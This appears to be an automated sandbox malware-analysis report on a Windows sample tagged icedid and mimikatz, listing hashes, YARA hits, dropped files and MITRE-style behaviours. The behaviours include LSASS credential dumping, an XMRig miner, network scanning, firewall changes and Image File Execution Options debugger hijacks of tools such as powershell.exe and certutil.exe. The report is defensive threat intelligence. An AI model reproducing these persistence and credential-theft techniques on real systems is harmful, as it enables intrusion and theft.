Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
01-10-2024 06:31
Behavioral task
behavioral1
Sample
2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
833584844ffcd5b87c2d2e05a6123b10
-
SHA1
12fac3b4435ae64c8d4b0b9fbac067b753622654
-
SHA256
b9319549a18a8579985a3b5f89a871a56185fdbcfc45e2411a0dcb79e6c46b8f
-
SHA512
16e32d0049dc4799cbe2ae2f79a4409e3df8474b2afa149cec2faab44299f95e1f883654d0eed300e1455f4d1e66c6471a823bd54ffc3c5c5e6d7defe412bdf1
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2648 created 492 2648 wufiyti.exe 17 -
Contacts a large (16944) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral1/memory/1792-192-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-209-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-233-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-238-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-239-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-240-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-253-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-260-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-266-0x000000013F020000-0x000000013F140000-memory.dmp xmrig behavioral1/memory/1792-284-0x000000013F020000-0x000000013F140000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 8 IoCs
resource yara_rule behavioral1/memory/2892-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/2892-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/files/0x0009000000015d5f-5.dat mimikatz behavioral1/memory/1808-9-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral1/memory/1992-134-0x0000000001020000-0x000000000110E000-memory.dmp mimikatz behavioral1/memory/2708-138-0x000000013FBD0000-0x000000013FCBE000-memory.dmp mimikatz behavioral1/memory/2648-167-0x0000000002EA0000-0x0000000002FC0000-memory.dmp mimikatz behavioral1/memory/2648-191-0x0000000002EA0000-0x0000000002FC0000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts wufiyti.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" wufiyti.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe wufiyti.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2152 netsh.exe 1692 netsh.exe -
Executes dropped EXE 19 IoCs
pid Process 1808 wufiyti.exe 2648 wufiyti.exe 2132 wpcap.exe 1796 cbthytaiu.exe 2708 vfshost.exe 600 xohudmc.exe 2408 dqljao.exe 992 yzbibbali.exe 1792 vcgilh.exe 2632 yzbibbali.exe 2856 yzbibbali.exe 584 yzbibbali.exe 2236 yzbibbali.exe 2924 yzbibbali.exe 1148 yzbibbali.exe 1276 yzbibbali.exe 1532 wufiyti.exe 808 vthezglus.exe 1844 wufiyti.exe -
Loads dropped DLL 25 IoCs
pid Process 2752 cmd.exe 2752 cmd.exe 2232 cmd.exe 2132 wpcap.exe 2132 wpcap.exe 2132 wpcap.exe 2132 wpcap.exe 2132 wpcap.exe 1736 cmd.exe 1796 cbthytaiu.exe 1796 cbthytaiu.exe 1992 cmd.exe 1992 cmd.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 2648 wufiyti.exe 1536 cmd.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 19 ifconfig.me 18 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 12 IoCs
description ioc Process File created C:\Windows\system32\Packet.dll wpcap.exe File created C:\Windows\SysWOW64\dqljao.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\dqljao.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 wufiyti.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat wufiyti.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 wufiyti.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE wufiyti.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE wufiyti.exe -
resource yara_rule behavioral1/files/0x000500000001963b-130.dat upx behavioral1/memory/2708-136-0x000000013FBD0000-0x000000013FCBE000-memory.dmp upx behavioral1/memory/2708-138-0x000000013FBD0000-0x000000013FCBE000-memory.dmp upx behavioral1/files/0x000500000001964f-158.dat upx behavioral1/memory/992-162-0x000000013F6F0000-0x000000013F74B000-memory.dmp upx behavioral1/files/0x0005000000019650-165.dat upx behavioral1/memory/2648-167-0x0000000002EA0000-0x0000000002FC0000-memory.dmp upx behavioral1/memory/1792-169-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/992-170-0x000000013F6F0000-0x000000013F74B000-memory.dmp upx behavioral1/memory/2632-178-0x000000013FE70000-0x000000013FECB000-memory.dmp upx behavioral1/memory/2632-180-0x000000013FE70000-0x000000013FECB000-memory.dmp upx behavioral1/memory/2856-187-0x000000013F420000-0x000000013F47B000-memory.dmp upx behavioral1/memory/2856-189-0x000000013F420000-0x000000013F47B000-memory.dmp upx behavioral1/memory/1792-192-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/2648-194-0x0000000001B10000-0x0000000001B6B000-memory.dmp upx behavioral1/memory/584-198-0x000000013F270000-0x000000013F2CB000-memory.dmp upx behavioral1/memory/2236-204-0x000000013FE60000-0x000000013FEBB000-memory.dmp upx behavioral1/memory/2236-207-0x000000013FE60000-0x000000013FEBB000-memory.dmp upx behavioral1/memory/1792-209-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/2924-214-0x000000013F620000-0x000000013F67B000-memory.dmp upx behavioral1/memory/2924-216-0x000000013F620000-0x000000013F67B000-memory.dmp upx behavioral1/memory/2648-220-0x0000000000B50000-0x0000000000BAB000-memory.dmp upx behavioral1/memory/1148-223-0x000000013FA70000-0x000000013FACB000-memory.dmp upx behavioral1/memory/1276-229-0x000000013F080000-0x000000013F0DB000-memory.dmp upx behavioral1/memory/1276-231-0x000000013F080000-0x000000013F0DB000-memory.dmp upx behavioral1/memory/1792-233-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-238-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-239-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-240-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-253-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-260-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-266-0x000000013F020000-0x000000013F140000-memory.dmp upx behavioral1/memory/1792-284-0x000000013F020000-0x000000013F140000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\givrmulcy\UnattendGC\specials\trch-1.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\vimpcsvc.xml wufiyti.exe File opened for modification C:\Windows\givrmulcy\Corporate\log.txt cmd.exe File opened for modification C:\Windows\givrmulcy\rzmtpgnet\Packet.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\docmicfg.xml wufiyti.exe File created C:\Windows\fbleugiz\spoolsrv.xml wufiyti.exe File created C:\Windows\givrmulcy\Corporate\vfshost.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\coli-0.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\tucl-1.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\ucl.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\spoolsrv.xml wufiyti.exe File created C:\Windows\fbleugiz\schoedcl.xml wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\ip.txt wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\Packet.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\ssleay32.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\schoedcl.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\vimpcsvc.xml wufiyti.exe File created C:\Windows\givrmulcy\Corporate\mimidrv.sys wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\scan.bat wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\posh-0.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\xdvl-0.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\spoolsrv.xml wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\trfo-2.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\svschost.exe wufiyti.exe File created C:\Windows\fbleugiz\vimpcsvc.xml wufiyti.exe File created C:\Windows\fbleugiz\docmicfg.xml wufiyti.exe File opened for modification C:\Windows\fbleugiz\vimpcsvc.xml wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\Shellcode.ini wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\AppCapture32.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\crli-0.dll wufiyti.exe File created C:\Windows\givrmulcy\upbdrjv\swrpwe.exe wufiyti.exe File opened for modification C:\Windows\givrmulcy\rzmtpgnet\Result.txt vthezglus.exe File created C:\Windows\givrmulcy\UnattendGC\schoedcl.xml wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\vthezglus.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\docmicfg.exe wufiyti.exe File opened for modification C:\Windows\fbleugiz\svschost.xml wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\AppCapture64.dll wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\wpcap.dll wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\cbthytaiu.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\tibe-2.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\svschost.xml wufiyti.exe File created C:\Windows\givrmulcy\Corporate\mimilib.dll wufiyti.exe File created C:\Windows\fbleugiz\wufiyti.exe 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe File created C:\Windows\givrmulcy\UnattendGC\specials\cnli-1.dll wufiyti.exe File opened for modification C:\Windows\fbleugiz\spoolsrv.xml wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\spoolsrv.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\vimpcsvc.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\svschost.xml wufiyti.exe File created C:\Windows\ime\wufiyti.exe wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\zlib1.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\exma-1.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\libxml2.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\docmicfg.xml wufiyti.exe File created C:\Windows\givrmulcy\rzmtpgnet\wpcap.exe wufiyti.exe File opened for modification C:\Windows\fbleugiz\docmicfg.xml wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\libeay32.dll wufiyti.exe File created C:\Windows\givrmulcy\UnattendGC\specials\schoedcl.xml wufiyti.exe File created C:\Windows\fbleugiz\svschost.xml wufiyti.exe File opened for modification C:\Windows\fbleugiz\schoedcl.xml wufiyti.exe File opened for modification C:\Windows\fbleugiz\wufiyti.exe 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1856 sc.exe 1576 sc.exe 1776 sc.exe 2384 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dqljao.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vthezglus.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-10-01_833584844ffcd5b87c2d2e05a6123b10_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cbthytaiu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wufiyti.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key 